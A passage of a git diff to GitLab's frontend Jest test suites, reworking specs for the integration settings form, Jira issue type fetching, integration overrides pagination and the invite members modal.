expect(findTestButton().props('disabled')).toBe(false); + }); + + it('emits `VALIDATE_INTEGRATION_FORM_EVENT`', () => { + expect(eventHub.$emit).toHaveBeenCalledWith(VALIDATE_INTEGRATION_FORM_EVENT); + }); + }); + }); + + describe('when `test` button is clicked', () => { + describe('when form is invalid', () => { + it('emits `VALIDATE_INTEGRATION_FORM_EVENT` event to the event hub', () => { + createForm({ isValid: false }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + }, + }); + + findTestButton().vm.$emit('click', new Event('click')); + + expect(eventHub.$emit).toHaveBeenCalledWith(VALIDATE_INTEGRATION_FORM_EVENT); + }); + }); + + describe('when form is valid', () => { + const mockTestPath = '/test'; + + beforeEach(() => { + createForm({ isValid: true }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + testPath: mockTestPath, + }, + }); + }); + + describe('buttons', () => { + beforeEach(async () => { + await findTestButton().vm.$emit('click', new Event('click')); + }); + + it('sets test button `loading` prop to `true`', () => { + expect(findTestButton().props('loading')).toBe(true); + }); + + it('sets save button `disabled` prop to `true`', () => { + expect(findSaveButton().props('disabled')).toBe(true); + }); + }); + + describe.each` + scenario | replyStatus | errorMessage | expectToast | expectSentry + ${'when "test settings" request fails'} | ${httpStatus.INTERNAL_SERVER_ERROR} | ${undefined} | ${I18N_DEFAULT_ERROR_MESSAGE} | ${true} + ${'when "test settings" returns an error'} | ${httpStatus.OK} | ${'an error'} | ${'an error'} | ${false} + ${'when "test settings" succeeds'} | ${httpStatus.OK} | ${undefined} | ${I18N_SUCCESSFUL_CONNECTION_MESSAGE} | ${false} + `('$scenario', ({ replyStatus, errorMessage, expectToast, expectSentry }) => { + beforeEach(async () => { + mockAxios.onPut(mockTestPath).replyOnce(replyStatus, { + error: Boolean(errorMessage), + message: errorMessage, + }); + + await findTestButton().vm.$emit('click', new Event('click')); + await waitForPromises(); + }); + + it(`calls toast with '${expectToast}'`, () => { + expect(mockToastShow).toHaveBeenCalledWith(expectToast); + }); + + it('sets `loading` prop of test button to `false`', () => { + expect(findTestButton().props('loading')).toBe(false); + }); + + it('sets save button `disabled` prop to `false`', () => { + expect(findSaveButton().props('disabled')).toBe(false); + }); + + it(`${expectSentry ? 'does' : 'does not'} capture exception in Sentry`, () => { + expect(Sentry.captureException).toHaveBeenCalledTimes(expectSentry ? 1 : 0); + }); + }); + }); + }); }); diff --git a/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js b/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js index 3a664b652ac..b5a8eed3598 100644 --- a/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js +++ b/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js @@ -1,10 +1,7 @@ import { GlFormCheckbox, GlFormInput } from '@gitlab/ui'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import { - GET_JIRA_ISSUE_TYPES_EVENT, - VALIDATE_INTEGRATION_FORM_EVENT, -} from '~/integrations/constants'; +import { VALIDATE_INTEGRATION_FORM_EVENT } from '~/integrations/constants'; import JiraIssuesFields from '~/integrations/edit/components/jira_issues_fields.vue'; import eventHub from '~/integrations/edit/event_hub'; import { createStore } from '~/integrations/edit/store'; @@ -216,13 +213,11 @@ describe('JiraIssuesFields', () => { ); }); - it('emits "getJiraIssueTypes" to the eventHub when the jira-vulnerabilities component requests to fetch issue types', async () => { - const eventHubEmitSpy = jest.spyOn(eventHub, '$emit'); - + it('emits "request-jira-issue-types` when the jira-vulnerabilities component requests to fetch issue types', async () => { await setEnableCheckbox(true); - await findJiraForVulnerabilities().vm.$emit('request-get-issue-types'); + await findJiraForVulnerabilities().vm.$emit('request-jira-issue-types'); - expect(eventHubEmitSpy).toHaveBeenCalledWith(GET_JIRA_ISSUE_TYPES_EVENT); + expect(wrapper.emitted('request-jira-issue-types')).toHaveLength(1); }); }); diff --git a/spec/frontend/integrations/edit/mock_data.js b/spec/frontend/integrations/edit/mock_data.js index 27ba0768331..3c45ed0fb1b 100644 --- a/spec/frontend/integrations/edit/mock_data.js +++ b/spec/frontend/integrations/edit/mock_data.js @@ -14,3 +14,9 @@ export const mockIntegrationProps = { type: '', inheritFromId: 25, }; + +export const mockJiraIssueTypes = [ + { id: '1', name: 'issue', description: 'issue' }, + { id: '2', name: 'bug', description: 'bug' }, + { id: '3', name: 'epic', description: 'epic' }, +]; diff --git a/spec/frontend/integrations/edit/store/actions_spec.js b/spec/frontend/integrations/edit/store/actions_spec.js index e2f4c138ece..b413de2b286 100644 --- a/spec/frontend/integrations/edit/store/actions_spec.js +++ b/spec/frontend/integrations/edit/store/actions_spec.js @@ -1,8 +1,9 @@ +import axios from 'axios'; +import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; +import { I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE } from '~/integrations/constants'; import { setOverride, - setIsSaving, - setIsTesting, setIsResetting, requestResetIntegration, receiveResetIntegrationSuccess, @@ -14,14 +15,21 @@ import { import * as types from '~/integrations/edit/store/mutation_types'; import createState from '~/integrations/edit/store/state'; import { refreshCurrentPage } from '~/lib/utils/url_utility'; +import { mockJiraIssueTypes } from '../mock_data'; jest.mock('~/lib/utils/url_utility'); describe('Integration form store actions', () => { let state; + let mockAxios; beforeEach(() => { state = createState(); + mockAxios = new MockAdapter(axios); + }); + + afterEach(() => { + mockAxios.restore(); }); describe('setOverride', () => { @@ -30,18 +38,6 @@ describe('Integration form store actions', () => { }); }); - describe('setIsSaving', () => { - it('should commit isSaving mutation', () => { - return testAction(setIsSaving, true, state, [{ type: types.SET_IS_SAVING, payload: true }]); - }); - }); - - describe('setIsTesting', () => { - it('should commit isTesting mutation', () => { - return testAction(setIsTesting, true, state, [{ type: types.SET_IS_TESTING, payload: true }]); - }); - }); - describe('setIsResetting', () => { it('should commit isResetting mutation', () => { return testAction(setIsResetting, true, state, [ @@ -75,11 +71,28 @@ describe('Integration form store actions', () => { }); describe('requestJiraIssueTypes', () => { - it('should commit SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE and SET_IS_LOADING_JIRA_ISSUE_TYPES mutations', () => { - return testAction(requestJiraIssueTypes, null, state, [ - { type: types.SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE, payload: '' }, - { type: types.SET_IS_LOADING_JIRA_ISSUE_TYPES, payload: true }, - ]); + describe.each` + scenario | responseCode | response | action + ${'when successful'} | ${200} | ${{ issuetypes: mockJiraIssueTypes }} | ${{ type: 'receiveJiraIssueTypesSuccess', payload: mockJiraIssueTypes }} + ${'when response has no issue types'} | ${200} | ${{ issuetypes: [] }} | ${{ type: 'receiveJiraIssueTypesError', payload: I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE }} + ${'when response includes error'} | ${200} | ${{ error: new Error() }} | ${{ type: 'receiveJiraIssueTypesError', payload: I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE }} + ${'when error occurs'} | ${500} | ${{}} | ${{ type: 'receiveJiraIssueTypesError', payload: expect.any(String) }} + `('$scenario', ({ responseCode, response, action }) => { + it(`should commit SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE and SET_IS_LOADING_JIRA_ISSUE_TYPES mutations, and dispatch ${action.type}`, () => { + mockAxios.onPut('/test').replyOnce(responseCode, response); + + return testAction( + requestJiraIssueTypes, + new FormData(), + { propsSource: { testPath: '/test' } }, + [ + // should clear the error messages and set the loading state + { type: types.SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE, payload: '' }, + { type: types.SET_IS_LOADING_JIRA_ISSUE_TYPES, payload: true }, + ], + [action], + ); + }); }); }); diff --git a/spec/frontend/integrations/edit/store/getters_spec.js b/spec/frontend/integrations/edit/store/getters_spec.js index ad7a887dff2..3353e0c84cc 100644 --- a/spec/frontend/integrations/edit/store/getters_spec.js +++ b/spec/frontend/integrations/edit/store/getters_spec.js @@ -1,11 +1,4 @@ -import { - currentKey, - isInheriting, - isDisabled, - propsSource, -} from '~/integrations/edit/store/getters'; -import * as types from '~/integrations/edit/store/mutation_types'; -import mutations from '~/integrations/edit/store/mutations'; +import { currentKey, isInheriting, propsSource } from '~/integrations/edit/store/getters'; import createState from '~/integrations/edit/store/state'; import { mockIntegrationProps } from '../mock_data'; @@ -52,29 +45,6 @@ describe('Integration form store getters', () => { }); }); - describe('isDisabled', () => { - it.each` - isSaving | isTesting | isResetting | expected - ${false} | ${false} | ${false} | ${false} - ${true} | ${false} | ${false} | ${true} - ${false} | ${true} | ${false} | ${true} - ${false} | ${false} | ${true} | ${true} - ${false} | ${true} | ${true} | ${true} - ${true} | ${false} | ${true} | ${true} - ${true} | ${true} | ${false} | ${true} - ${true} | ${true} | ${true} | ${true} - `( - 'when isSaving = $isSaving, isTesting = $isTesting, isResetting = $isResetting then isDisabled = $expected', - ({ isSaving, isTesting, isResetting, expected }) => { - mutations[types.SET_IS_SAVING](state, isSaving); - mutations[types.SET_IS_TESTING](state, isTesting); - mutations[types.SET_IS_RESETTING](state, isResetting); - - expect(isDisabled(state)).toBe(expected); - }, - ); - }); - describe('propsSource', () => { beforeEach(() => { state.defaultState = defaultState; diff --git a/spec/frontend/integrations/edit/store/mutations_spec.js b/spec/frontend/integrations/edit/store/mutations_spec.js index 18faa2f6bba..641547550d1 100644 --- a/spec/frontend/integrations/edit/store/mutations_spec.js +++ b/spec/frontend/integrations/edit/store/mutations_spec.js @@ -17,22 +17,6 @@ describe('Integration form store mutations', () => { }); }); - describe(`${types.SET_IS_SAVING}`, () => { - it('sets isSaving', () => { - mutations[types.SET_IS_SAVING](state, true); - - expect(state.isSaving).toBe(true); - }); - }); - - describe(`${types.SET_IS_TESTING}`, () => { - it('sets isTesting', () => { - mutations[types.SET_IS_TESTING](state, true); - - expect(state.isTesting).toBe(true); - }); - }); - describe(`${types.SET_IS_RESETTING}`, () => { it('sets isResetting', () => { mutations[types.SET_IS_RESETTING](state, true); diff --git a/spec/frontend/integrations/edit/store/state_spec.js b/spec/frontend/integrations/edit/store/state_spec.js index 6cd84836395..5582be7fd3c 100644 --- a/spec/frontend/integrations/edit/store/state_spec.js +++ b/spec/frontend/integrations/edit/store/state_spec.js @@ -6,7 +6,6 @@ describe('Integration form state factory', () => { defaultState: null, customState: {}, isSaving: false, - isTesting: false, isResetting: false, override: false, isLoadingJiraIssueTypes: false, diff --git a/spec/frontend/integrations/integration_settings_form_spec.js b/spec/frontend/integrations/integration_settings_form_spec.js deleted file mode 100644 index c35d178e518..00000000000 --- a/spec/frontend/integrations/integration_settings_form_spec.js +++ /dev/null @@ -1,248 +0,0 @@ -import MockAdaptor from 'axios-mock-adapter'; -import IntegrationSettingsForm from '~/integrations/integration_settings_form'; -import eventHub from '~/integrations/edit/event_hub'; -import axios from '~/lib/utils/axios_utils'; -import toast from '~/vue_shared/plugins/global_toast'; -import { - I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE, - I18N_SUCCESSFUL_CONNECTION_MESSAGE, - I18N_DEFAULT_ERROR_MESSAGE, - GET_JIRA_ISSUE_TYPES_EVENT, - TOGGLE_INTEGRATION_EVENT, - TEST_INTEGRATION_EVENT, - SAVE_INTEGRATION_EVENT, -} from '~/integrations/constants'; -import waitForPromises from 'helpers/wait_for_promises'; - -jest.mock('~/vue_shared/plugins/global_toast'); -jest.mock('lodash/delay', () => (callback) => callback()); - -const FIXTURE = 'services/edit_service.html'; - -describe('IntegrationSettingsForm', () => { - let integrationSettingsForm; - - const mockStoreDispatch = () => jest.spyOn(integrationSettingsForm.vue.$store, 'dispatch'); - - beforeEach(() => { - loadFixtures(FIXTURE); - - integrationSettingsForm = new IntegrationSettingsForm('.js-integration-settings-form'); - integrationSettingsForm.init(); - }); - - describe('constructor', () => { - it('should initialize form element refs on class object', () => { - expect(integrationSettingsForm.$form).toBeDefined(); - expect(integrationSettingsForm.$form.nodeName).toBe('FORM'); - expect(integrationSettingsForm.formActive).toBeDefined(); - }); - - it('should initialize form metadata on class object', () => { - expect(integrationSettingsForm.testEndPoint).toBeDefined(); - }); - }); - - describe('event handling', () => { - let mockAxios; - - beforeEach(() => { - mockAxios = new MockAdaptor(axios); - jest.spyOn(axios, 'put'); - }); - - afterEach(() => { - mockAxios.restore(); - eventHub.dispose(); // clear event hub handlers - }); - - describe('when event hub receives `TOGGLE_INTEGRATION_EVENT`', () => { - it('should remove `novalidate` attribute to form when called with `true`', () => { - eventHub.$emit(TOGGLE_INTEGRATION_EVENT, true); - - expect(integrationSettingsForm.$form.getAttribute('novalidate')).toBe(null); - }); - - it('should set `novalidate` attribute to form when called with `false`', () => { - eventHub.$emit(TOGGLE_INTEGRATION_EVENT, false); - - expect(integrationSettingsForm.$form.getAttribute('novalidate')).toBe('novalidate'); - }); - }); - - describe('when event hub receives `TEST_INTEGRATION_EVENT`', () => { - describe('when form is valid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(true); - }); - - it('should make an ajax request with provided `formData`', async () => { - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(axios.put).toHaveBeenCalledWith( - integrationSettingsForm.testEndPoint, - new FormData(integrationSettingsForm.$form), - ); - }); - - it('should show success message if test is successful', async () => { - jest.spyOn(integrationSettingsForm.$form, 'submit').mockImplementation(() => {}); - - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: false, - }); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(I18N_SUCCESSFUL_CONNECTION_MESSAGE); - }); - - it('should show error message if ajax request responds with test error', async () => { - const errorMessage = 'Test failed.'; - const serviceResponse = 'some error'; - - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: true, - message: errorMessage, - service_response: serviceResponse, - test_failed: false, - }); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(`${errorMessage} ${serviceResponse}`); - }); - - it('should show error message if ajax request failed', async () => { - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(I18N_DEFAULT_ERROR_MESSAGE); - }); - - it('should always dispatch `setIsTesting` with `false` once request is completed', async () => { - const dispatchSpy = mockStoreDispatch(); - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('setIsTesting', false); - }); - }); - - describe('when form is invalid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(false); - jest.spyOn(integrationSettingsForm, 'testSettings'); - }); - - it('should dispatch `setIsTesting` with `false` and not call `testSettings`', async () => { - const dispatchSpy = mockStoreDispatch(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('setIsTesting', false); - expect(integrationSettingsForm.testSettings).not.toHaveBeenCalled(); - }); - }); - }); - - describe('when event hub receives `GET_JIRA_ISSUE_TYPES_EVENT`', () => { - it('should always dispatch `requestJiraIssueTypes`', () => { - const dispatchSpy = mockStoreDispatch(); - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - - expect(dispatchSpy).toHaveBeenCalledWith('requestJiraIssueTypes'); - }); - - it('should make an ajax request with provided `formData`', () => { - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - - expect(axios.put).toHaveBeenCalledWith( - integrationSettingsForm.testEndPoint, - new FormData(integrationSettingsForm.$form), - ); - }); - - it('should dispatch `receiveJiraIssueTypesSuccess` with the correct payload if ajax request is successful', async () => { - const dispatchSpy = mockStoreDispatch(); - const mockData = ['ISSUE', 'EPIC']; - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: false, - issuetypes: mockData, - }); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('receiveJiraIssueTypesSuccess', mockData); - }); - - it.each(['Custom error message here', undefined])( - 'should dispatch "receiveJiraIssueTypesError" with a message if the backend responds with error', - async (responseErrorMessage) => { - const dispatchSpy = mockStoreDispatch(); - - const expectedErrorMessage = - responseErrorMessage || I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE; - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: true, - message: responseErrorMessage, - }); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith( - 'receiveJiraIssueTypesError', - expectedErrorMessage, - ); - }, - ); - }); - - describe('when event hub receives `SAVE_INTEGRATION_EVENT`', () => { - describe('when form is valid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(true); - jest.spyOn(integrationSettingsForm.$form, 'submit'); - }); - - it('should submit the form', async () => { - eventHub.$emit(SAVE_INTEGRATION_EVENT); - await waitForPromises(); - - expect(integrationSettingsForm.$form.submit).toHaveBeenCalled(); - expect(integrationSettingsForm.$form.submit).toHaveBeenCalledTimes(1); - }); - }); - - describe('when form is invalid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(false); - jest.spyOn(integrationSettingsForm.$form, 'submit'); - }); - - it('should dispatch `setIsSaving` with `false` and not submit form', async () => { - const dispatchSpy = mockStoreDispatch(); - - eventHub.$emit(SAVE_INTEGRATION_EVENT); - - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('setIsSaving', false); - expect(integrationSettingsForm.$form.submit).not.toHaveBeenCalled(); - }); - }); - }); - }); -}); diff --git a/spec/frontend/integrations/overrides/components/integration_overrides_spec.js b/spec/frontend/integrations/overrides/components/integration_overrides_spec.js index ae89d05cead..8abd83887f7 100644 --- a/spec/frontend/integrations/overrides/components/integration_overrides_spec.js +++ b/spec/frontend/integrations/overrides/components/integration_overrides_spec.js @@ -8,6 +8,7 @@ import IntegrationOverrides from '~/integrations/overrides/components/integratio import axios from '~/lib/utils/axios_utils'; import httpStatus from '~/lib/utils/http_status'; import ProjectAvatar from '~/vue_shared/components/project_avatar.vue'; +import UrlSync from '~/vue_shared/components/url_sync.vue'; const mockOverrides = Array(DEFAULT_PER_PAGE * 3) .fill(1) @@ -26,9 +27,10 @@ describe('IntegrationOverrides', () => { overridesPath: 'mock/overrides', }; - const createComponent = ({ mountFn = shallowMount } = {}) => { + const createComponent = ({ mountFn = shallowMount, stubs } = {}) => { wrapper = mountFn(IntegrationOverrides, { propsData: defaultProps, + stubs, }); }; @@ -127,27 +129,58 @@ describe('IntegrationOverrides', () => { }); describe('pagination', () => { - it('triggers fetch when `input` event is emitted', async () => { - createComponent(); - jest.spyOn(axios, 'get'); - await waitForPromises(); + describe('when total items does not exceed the page limit', () => { + it('does not render', async () => { + mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { + 'X-TOTAL': DEFAULT_PER_PAGE - 1, + 'X-PAGE': 1, + }); + + createComponent(); + + // wait for initial load + await waitForPromises(); - await findPagination().vm.$emit('input', 2); - expect(axios.get).toHaveBeenCalledWith(defaultProps.overridesPath, { - params: { page: 2, per_page: DEFAULT_PER_PAGE }, + expect(findPagination().exists()).toBe(false); }); }); - it('does not render with <=1 page', async () => { - mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { - 'X-TOTAL': 1, - 'X-PAGE': 1, + describe('when total items exceeds the page limit', () => { + const mockPage = 2; + + beforeEach(async () => { + createComponent({ stubs: { UrlSync } }); + mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { + 'X-TOTAL': DEFAULT_PER_PAGE * 2, + 'X-PAGE': mockPage, + }); + + // wait for initial load + await waitForPromises(); }); - createComponent(); - await waitForPromises(); + it('renders', () => { + expect(findPagination().exists()).toBe(true); + }); - expect(findPagination().exists()).toBe(false); + describe('when navigating to a page', () => { + beforeEach(async () => { + jest.spyOn(axios, 'get'); + + // trigger a page change + await findPagination().vm.$emit('input', mockPage); + }); + + it('performs GET request with correct params', () => { + expect(axios.get).toHaveBeenCalledWith(defaultProps.overridesPath, { + params: { page: mockPage, per_page: DEFAULT_PER_PAGE }, + }); + }); + + it('updates `page` URL parameter', () => { + expect(window.location.search).toBe(`?page=${mockPage}`); + }); + }); }); }); }); diff --git a/spec/frontend/invite_members/components/invite_members_modal_spec.js b/spec/frontend/invite_members/components/invite_members_modal_spec.js index 5be79004640..e190ddf243e 100644 --- a/spec/frontend/invite_members/components/invite_members_modal_spec.js +++ b/spec/frontend/invite_members/components/invite_members_modal_spec.js @@ -6,7 +6,6 @@ import { GlSprintf, GlLink, GlModal, - GlFormCheckboxGroup, } from '@gitlab/ui'; import MockAdapter from 'axios-mock-adapter'; import { stubComponent } from 'helpers/stub_component'; @@ -18,8 +17,6 @@ import InviteMembersModal from '~/invite_members/components/invite_members_modal import ModalConfetti from '~/invite_members/components/confetti.vue'; import MembersTokenSelect from '~/invite_members/components/members_token_select.vue'; import { - INVITE_MEMBERS_IN_COMMENT, - MEMBER_AREAS_OF_FOCUS, INVITE_MEMBERS_FOR_TASK, CANCEL_BUTTON_TEXT, INVITE_BUTTON_TEXT, @@ -28,6 +25,7 @@ import { MEMBERS_MODAL_DEFAULT_TITLE, MEMBERS_PLACEHOLDER, MEMBERS_TO_PROJECT_CELEBRATE_INTRO_TEXT, + LEARN_GITLAB, } from '~/invite_members/constants'; import eventHub from '~/invite_members/event_hub'; import axios from '~/lib/utils/axios_utils'; @@ -51,12 +49,7 @@ const inviteeType = 'members'; const accessLevels = { Guest: 10, Reporter: 20, Developer: 30, Maintainer: 40, Owner: 50 }; const defaultAccessLevel = 10; const inviteSource = 'unknown'; -const noSelectionAreasOfFocus = ['no_selection']; const helpLink = 'https://example.com'; -const areasOfFocusOptions = [ - { text: 'area1', value: 'area1' }, - { text: 'area2', value: 'area2' }, -]; const tasksToBeDoneOptions = [ { text: 'First task', value: 'first' }, { text: 'Second task', value: 'second' }, @@ -95,9 +88,7 @@ const createComponent = (data = {}, props = {}) => { isProject, inviteeType, accessLevels, - areasOfFocusOptions, defaultAccessLevel, - noSelectionAreasOfFocus, tasksToBeDoneOptions, projects, helpLink, @@ -163,7 +154,6 @@ describe('InviteMembersModal', () => { const membersFormGroupInvalidFeedback = () => findMembersFormGroup().props('invalidFeedback'); const membersFormGroupDescription = () => findMembersFormGroup().props('description'); const findMembersSelect = () => wrapper.findComponent(MembersTokenSelect); - const findAreaofFocusCheckBoxGroup = () => wrapper.findComponent(GlFormCheckboxGroup); const findTasksToBeDone = () => wrapper.findByTestId('invite-members-modal-tasks-to-be-done'); const findTasks = () => wrapper.findByTestId('invite-members-modal-tasks'); const findProjectSelect = () => wrapper.findByTestId('invite-members-modal-project-select'); @@ -214,21 +204,6 @@ describe('InviteMembersModal', () => { }); }); - describe('rendering the areas_of_focus', () => { - it('renders the areas_of_focus checkboxes', () => { - createComponent(); - - expect(findAreaofFocusCheckBoxGroup().props('options')).toBe(areasOfFocusOptions); - expect(findAreaofFocusCheckBoxGroup().exists()).toBe(true); - }); - - it('does not render the areas_of_focus checkboxes', () => { - createComponent({}, { areasOfFocusOptions: [] }); - - expect(findAreaofFocusCheckBoxGroup().exists()).toBe(false); - }); - }); - describe('rendering the tasks to be done', () => { const setupComponent = ( extraData = {}, @@ -268,6 +243,14 @@ describe('InviteMembersModal', () => { expect(findTasksToBeDone().exists()).toBe(false); }); + + describe('when opened from the Learn GitLab page', () => { + it('does render the tasks to be done', () => { + setupComponent({ source: LEARN_GITLAB }, {}, []); + + expect(findTasksToBeDone().exists()).toBe(true); + }); + }); }); describe('rendering the tasks', () => { @@ -433,20 +416,6 @@ describe('InviteMembersModal', () => { "The member's email address is not allowed for this project. Go to the Admin area > Sign-up restrictions, and check Allowed domains for sign-ups."; const expectedSyntaxError = 'email contains an invalid email address'; - it('calls the API with the expected focus data when an areas_of_focus checkbox is clicked', () => { - const spy = jest.spyOn(Api, 'addGroupMembersByUserId'); - const expectedFocus = [areasOfFocusOptions[0].value]; - createComponent({ newUsersToInvite: [user1] }); - - findAreaofFocusCheckBoxGroup().vm.$emit('input', expectedFocus); - clickInviteButton(); - - expect(spy).toHaveBeenCalledWith( - user1.id.toString(), - expect.objectContaining({ areas_of_focus: expectedFocus }), - ); - }); - describe('when inviting an existing user to group by user ID', () => { const postData = { user_id: '1,2', @@ -454,7 +423,6 @@ describe('InviteMembersModal', () => { expires_at: undefined, invite_source: inviteSource, format: 'json', - areas_of_focus: noSelectionAreasOfFocus, tasks_to_be_done: [], tasks_project_id: '', }; @@ -465,17 +433,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'addGroupMembersByUserId').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - }); - - it('includes the non-default selected areas of focus', () => { - const focus = ['abc']; - const updatedPostData = { ...postData, areas_of_focus: focus }; - wrapper.setData({ selectedAreasOfFocus: focus }); - - clickInviteButton(); - - expect(Api.addGroupMembersByUserId).toHaveBeenCalledWith(id, updatedPostData); }); describe('when triggered from regular mounting', () => { @@ -492,7 +449,23 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); + }); + }); + + describe('when opened from a Learn GitLab page', () => { + it('emits the `showSuccessfulInvitationsAlert` event', async () => { + eventHub.$emit('openModal', { inviteeType: 'members', source: LEARN_GITLAB }); + + jest.spyOn(eventHub, '$emit').mockImplementation(); + + clickInviteButton(); + + await waitForPromises(); + + expect(eventHub.$emit).toHaveBeenCalledWith('showSuccessfulInvitationsAlert'); }); }); }); @@ -637,7 +610,6 @@ describe('InviteMembersModal', () => { expires_at: undefined, email: 'email@example.com', invite_source: inviteSource, - areas_of_focus: noSelectionAreasOfFocus, tasks_to_be_done: [], tasks_project_id: '', format: 'json', @@ -649,17 +621,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - }); - - it('includes the non-default selected areas of focus', () => { - const focus = ['abc']; - const updatedPostData = { ...postData, areas_of_focus: focus }; - wrapper.setData({ selectedAreasOfFocus: focus }); - - clickInviteButton(); - - expect(Api.inviteGroupMembersByEmail).toHaveBeenCalledWith(id, updatedPostData); }); describe('when triggered from regular mounting', () => { @@ -672,7 +633,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); }); @@ -711,13 +674,14 @@ describe('InviteMembersModal', () => { it('displays the successful toast message when email has already been invited', async () => { mockInvitationsApi(httpStatus.CREATED, invitationsApiResponse.EMAIL_TAKEN); wrapper.vm.$toast = { show: jest.fn() }; - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); clickInviteButton(); await waitForPromises(); - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); expect(findMembersSelect().props('validationState')).toBe(null); }); @@ -766,7 +730,6 @@ describe('InviteMembersModal', () => { access_level: defaultAccessLevel, expires_at: undefined, invite_source: inviteSource, - areas_of_focus: noSelectionAreasOfFocus, format: 'json', tasks_to_be_done: [], tasks_project_id: '', @@ -782,8 +745,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({ data: postData }); jest.spyOn(Api, 'addGroupMembersByUserId').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - jest.spyOn(wrapper.vm, 'trackInvite'); }); describe('when triggered from regular mounting', () => { @@ -800,7 +761,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); @@ -855,7 +818,6 @@ describe('InviteMembersModal', () => { wrapper.setData({ inviteeType: 'group' }); wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'groupShareWithGroup').mockResolvedValue({ data: groupPostData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); clickInviteButton(); }); @@ -865,7 +827,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); @@ -898,47 +862,11 @@ describe('InviteMembersModal', () => { jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({}); }); - it('tracks the invite', () => { - eventHub.$emit('openModal', { inviteeType: 'members', source: INVITE_MEMBERS_IN_COMMENT }); - - clickInviteButton(); - - 